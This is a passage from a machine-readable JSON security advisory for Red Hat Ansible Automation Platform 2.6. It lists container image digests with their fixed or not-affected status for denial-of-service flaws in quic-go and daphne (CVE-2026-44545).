"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers"
},
{
"cve": "CVE-2026-44545",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-03T15:01:49.007231+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "daphne: daphne: Denial of Service via excessive WebSocket message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
